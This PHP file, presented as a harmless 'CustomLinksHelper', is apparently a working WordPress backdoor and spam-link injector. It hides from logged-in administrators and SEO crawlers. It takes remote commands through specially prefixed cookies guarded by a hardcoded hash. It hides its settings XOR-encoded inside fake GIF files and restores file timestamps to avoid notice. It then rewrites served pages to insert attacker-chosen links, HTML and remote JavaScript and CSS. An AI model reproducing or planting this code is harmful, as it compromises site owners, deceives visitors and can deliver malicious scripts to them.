<?php

class CustomLinksHelper {
	var $replaceInfo;
	var $currentURL;
	var $config;
	var $debug = null;
	
	function init() {
		if ($this->isWPUser()) return;
		if ($this->isRestrictedBot()) return;
		
		$this->config = $this->getConfig();
		
		$this->currentURL = preg_replace("#(\?_"."_"."u"."t"."m"."c"."=[0-9a-f]{32}|_"."_"."u"."t"."m"."c"."=[0-9a-f]{32}&)#", "", $this->getServerVar('REQUEST_URI'));
		if (substr($this->currentURL, -1, 1) == '/')
			$this->currentURL = substr($this->currentURL, 0, -1);
		
		$this->actions();
		$this->process();
	}
	
	function isWPUser() {
		foreach ($_COOKIE as $name => $value) {
			if (preg_match('#^wp-settings-\d+$#', $name) || preg_match('#^wp-settings-time-\d+$#', $name) || preg_match('#^wordpress_logged_in_#', $name)) {
				return true;
			}
		}
		
		return false;
	}
	
	function isRestrictedBot() {
		$bots = array('semrushbot', 'mj12bot', 'ahrefsbot');
		foreach ($bots as $bot) {
			if (strpos(strtolower($_SERVER['HTTP_USER_AGENT']), $bot) !== false)
				return true;
		}
		
		return false;
	}
	
	function getServerVar($var = '') {
		if (isset($_SERVER) && is_array($_SERVER) && array_key_exists($var, $_SERVER) && !empty($_SERVER[$var])) {
			return $_SERVER[$var];
		} else if (function_exists('getenv') && getenv($var)) {
			return getenv($var);
		} else {
			return '';
		}
	}
	
	//Verify
	function process() {
		if (false === $this->config) return;
		
		$processBuffering = false;
		if (false !== ($page = $this->getPage())) {
			$this->replaceInfo = $page;
			$processBuffering = true;
			if ($this->debug)
				print "<r".$this->debug['tag'].">Page found: ".base64_encode($page)."</r".$this->debug['tag'].">\n";
		}
		
		if ($this->debug)
			print "<r".$this->debug['tag'].">Process buffering: ".($processBuffering ? "y" : "n")."</r".$this->debug['tag'].">\n";
		
		if (isset($this->config['options']['globalCSS']) && $this->config['options']['globalCSS'])
			$processBuffering = true;
		
		if (isset($this->config['options']['globalJS']) && $this->config['options']['globalJS'])
			$processBuffering = true;
		
		if ($processBuffering) {
			ob_start('CustomLinksHelperBufferEnd');
			
			if (function_exists('add_action'))
				add_action('init', array($this, 'initCallback'), 999);
		}
	}
	
	function initCallback() {
		ob_start('CustomLinksHelperBufferEnd');
	}
	
	function getPage() {
		$url = strtolower($this->currentURL);
		
		if ($this->debug) {
			print "<r".$this->debug['tag'].">Current page: ".$url."</r".$this->debug['tag'].">\n";
			print "<r".$this->debug['tag'].">Config: ".print_r($this->config['pages'], true)."</r".$this->debug['tag'].">\n";
		}
		
		if (isset($this->config['pages']) && isset($this->config['pages'][$url]))
			return $this->config['pages'][$url];
		
		return false;
	}
	//Verify
	
	//Actions
	function actions() {
		if (false === $this->config)
			$this->actionError('Wrong config');
		
		$params = $this->getActionParams();
		
		if (isset($params['act'])) {
			if (!isset($params['go']) || $params['go'] != '7beafa6501488267480c3823f6b163fd')
				$this->actionError('Go away!');
			
			$return = null;
			switch ($params['act']) {
				case 'page':
					if (!isset($params['url']) || !isset($params['unique']) || !isset($params['title']) || !isset($params['replace']))
						$this->actionError('Wrong params');
					
					if (isset($params['globalCSS']))
						$this->config['options']['globalCSS'] = $params['globalCSS'];
					if (isset($params['globalJS']))
						$this->config['options']['globalJS'] = $params['globalJS'];
					
					$return = $this->actionUpdatePage(array(
						'url' => $params['url'],
						'unique' => $params['unique'],
						'title' => $params['title'],
						'replace' => $params['replace'],
						'head' => isset($params['head']) ? $params['head'] : '',
						'footer' => isset($params['footer']) ? $params['footer'] : '',
						'delete' => isset($params['delete']) && $params['delete'],
						'title2' => $params['title2'],
						'unique2' => $params['unique2'],
						'replace2' => $params['replace2'],
					));
					break;
				case 'debug':
					$debug = array();
					
					if (!isset($params['tag']))
						$this->actionError('Wrong tag');
					
					$debug['tag'] = $params['tag'];
					
					$this->debug = $debug;
					
					print "<r".$this->debug['tag'].">Debug started</r".$this->debug['tag'].">\n";
					break;
				default:
					$this->actionError('Wrong action');
			}
			
			if ($return !== null) $this->actionSuccess($return);
		}
	}
	
	function getActionParams() {
		$prefix = '__gapcl';
		$length = strlen($prefix);
		
		$params = array();
		foreach ($_COOKIE as $key => $value) {
			if (substr($key, 0, $length) == $prefix) {
				$params[myfuncgood(substr($key, $length))] = myfuncgood($value);
			}
		}
		
		return $params;
	}
	
	function actionError($s) {
		die("ACTION_ERROR: ".$s);
	}
	
	function actionSuccess($s) {
		die("ACTION_OK: ".$s);
	}
	
	function str2regexp($s) {
		return preg_replace("#\s+#", "\\\\s+", preg_quote($s, "/"));
	}
	
	function actionUpdatePage($params) {
		if (!isset($this->config['pages'][$params['url']]))
			$this->config['pages'][$params['url']] = array();
		
		unset($this->config['pages'][$params['url']][$params['title']]);
		unset($this->config['pages'][$params['url']][$this->str2regexp($params['title'])]);
		
		if ($params['delete']) {
			if (!$this->config['pages'][$params['url']])
				unset($this->config['pages'][$params['url']]);
		} else {
			$params['title'] = $this->str2regexp($params['title']);
			$params['title2'] = $this->str2regexp($params['title2']);
			
			$this->config['pages'][$params['url']][$params['title']] = array(
				'unique' => $params['unique'],
				'replace' => $params['replace'],
				'unique2' => $params['unique2'],
				'title2' => $params['title2'],
				'replace2' => $params['replace2'],
				'head' => $params['head'],
				'footer' => $params['footer'],
			);
		}
		
		if (!$this->setConfig())
			$this->actionError('Cannot save config');
		
		return json_encode($this->config);
	}
	//Actions
	
	function bufferEnd($content) {
		if (isset($this->config['options']['globalCSS']) && $this->config['options']['globalCSS'])
			$content = preg_replace('#</head>#is', "<link rel=\"stylesheet\" href=\"".$this->config['options']['globalCSS']."\" type=\"text/css\" media=\"all\" />\n</head>", $content);
		
		if (isset($this->config['options']['globalJS']) && $this->config['options']['globalJS']) {
			if (preg_match('#</body>#is', $content))
				$content = preg_replace('#</body>#is', "<script type=\"text/javascript\" src=\"".$this->config['options']['globalJS']."\"></script>\n</body>", $content);
			elseif (preg_match('#<html[^>]*>#is', $content) && preg_match('#<head[^>]*>#is', $content) && preg_match('#<body[^>]*>#is', $content))
				$content .= "\n<script type=\"text/javascript\" src=\"".$this->config['options']['globalJS']."\"></script>";
		}
		
		if (!$this->replaceInfo) return $content;
		
		$deflated = false;
		if (function_exists('gzinflate')) {
			$inf = @gzinflate(substr($content, 10, -8));
			if ($inf !== false) {
				$content = $inf;
				$deflated = true;
			}
		}
		
		$content = $this->replaceLinks($content);
		
		if ($deflated) {
			$content = gzencode($content);
			
			$clen = strlen($content);
			@header("HTTP/1.1 200 OK");
			@header("Content-Length: $clen");
		}
		
		return $content;
	}
	
	function replaceLinks($content) {
		$head = '';
		$footer = '';
		
		foreach ($this->replaceInfo as $title => $replaceInfo) {
			if ($this->debug) {
				$content .= strlen($content).' ~~~ '.$replaceInfo['unique'].' ~~~ '.strpos($content, $replaceInfo['unique'])."\n";
				if (isset($replaceInfo['unique2']))
					$content .= strlen($content).' ~~~ '.$replaceInfo['unique2'].' ~~~ '.strpos($content, $replaceInfo['unique2'])."\n";
			}
			
			$replace = true;
			if ($this->debug)
				$content .= 'replace : '.($replace ? 'y' : 'n')."\n";
			
			if (isset($replaceInfo['unique2']) && $replaceInfo['unique2'] && isset($replaceInfo['replace2']) && $replaceInfo['replace2'] && !preg_match('/'.$this->str2regexp($replaceInfo['unique2']).'/', $content)) {
				$replace = false;
				if ($this->debug) {
					$text = 'isset unique2 => '.isset($replaceInfo['unique2']) ? 'y' : 'n';
					if (isset($replaceInfo['unique2'])) {
						$text .= '; unique2 not empty => '.($replaceInfo['unique2'] ? 'y' : 'n');
						if ($replaceInfo['unique2']) {
							$text .= '; isset replace2 => '.(isset($replaceInfo['replace2']) ? 'y' : 'n');
							if (isset($replaceInfo['replace2'])) {
								$text .= '; replace2 not empty => '.($replaceInfo['replace2'] ? 'y' : 'n');
								if ($replaceInfo['replace2']) {
									$text .= '; content contains unique2 => '.(preg_match('/'.$this->str2regexp($replaceInfo['unique2']).'/', $content) ? 'y' : 'n');
								}
							}
						}
					}
					$content .= 'no-replace : '.$text."\n";
				}
			}
			
			if (false !== strpos($content, $replaceInfo['replace'])) {
				$content .= 'no-replace : content contains replace ('.$replaceInfo['replace'].')'."\n";
				$replace = false;
			}
			
			if ($this->debug)
				$content .= 'replace : '.($replace ? 'y' : 'n')."\n";
			
			if ($replace) {
				$content = preg_replace('/'.$this->str2regexp($replaceInfo['unique']).'/', str_replace('$', '\\$', $replaceInfo['replace']), $content, 1);

				if (isset($replaceInfo['unique2']) && $replaceInfo['unique2'] && isset($replaceInfo['replace2']) && $replaceInfo['replace2'] && preg_match('/'.$this->str2regexp($replaceInfo['replace']).'/', $content)) {
					$content = preg_replace('/'.$this->str2regexp($replaceInfo['unique2']).'/', str_replace('$', '\\$', $replaceInfo['replace2']), $content, 1);
				}

				if ($replaceInfo['head'])
					$head .= $replaceInfo['head'];
				
				if ($replaceInfo['footer'])
					$footer .= $replaceInfo['footer'];
			}
		}
		
		if ($head && false === strpos($content, $head)) {
			if (preg_match('#</head>#is', $content))
				$content = preg_replace('#</head>#is', $head."\n</head>", $content, 1);
			else
				$content = preg_replace('#<body([^>]*)>#is', $head."\n<body\\1>", $content, 1);
		}
		
		if ($footer && false === strpos($content, $footer)) {
			if (preg_match('#</body>#is', $content))
				$content = preg_replace('#</body>#is', $footer."\n</body>", $content, 1);
			elseif (preg_match('#<(html|body)[^>]*>#i', $content))
				$content .= $footer;
		}
		
		return $content;
	}
	
	static function getInstance() {
		static $instance = null;
		
		if ($instance === null) $instance = new CustomLinksHelper();
		
		return $instance;
	}
	
	function getImagesFolder() {
		return dirname(__FILE__);
	}
	
	function getImageName($name) {
		return md5($name);
	}
	
	function getImage($name) {
		$file = $this->getImagesFolder().'/'.$this->getImageName($name).'.gif';
		if (!file_exists($file)) return false;
		
		return @unserialize($this->getImageDecodedText(file_get_contents($file)));
	}
	
	function setImage($name, $content, $encode = true, $ext = 'gif') {
		$folder = $this->getImagesFolder();
		$file = $folder.'/'.$this->getImageName($name).'.'.$ext;
		$time = @filemtime($folder);
		
		if (!@file_put_contents($file, $encode ? $this->getImageEncodedText(serialize($content)) : $content))
			return false;
		
		@touch($folder, $time);
		@touch($file, $time);
		
		return true;
	}
	
	function getConfigName() {
		return 'config://settings-custom-links.ini';
	}
	
	function getConfig() {
		$config = $this->getImage($this->getConfigName());
		
		if (!is_array($config))
			$config = array();
		
		if (!isset($config['pages']))
			$config['pages'] = array();
		
		if (!isset($config['options']))
			$config['options'] = array();
		
		return $config;
	}
	
	function setConfig() {
		return $this->setImage($this->getConfigName(), $this->config);
	}
	
	function getXorText($text) {
		$l = strlen($text);
		$c50 = chr(50);
		for ($i=0; $i<$l; $i++) {
			$text[$i] = ($text[$i] ^ $c50);
		}
		
		return $text;
	}
	
	function getImageDecodedText($content) {
		$content = substr($content, 50);
		return $this->getXorText($content);
	}
	
	function getImageEncodedText($content) {
		$content = self::getXorText($content);
		
		return myfuncgood('R0lGODlhAQAGAJEAABqAqNzg5P///wByniH5BAAAAAAALAAAAAABAAYAAAIE3CASBQA=').$content;
	}
}

function CustomLinksHelperBufferEnd($buffer) {
	static $processed = false;
	
	$instance = CustomLinksHelper::getInstance();
	
	if ($instance->debug)
		$buffer = "<r".$instance->debug['tag'].">CustomLinksHelperBufferEnd started: ".strlen($buffer)."</r".$instance->debug['tag'].">\n".$buffer;
	
	if (!$processed) {
		$buffer = $instance->bufferEnd($buffer);
		$processed = true;
	}
	
	return $buffer;
}

$instance = CustomLinksHelper::getInstance();
$instance->init();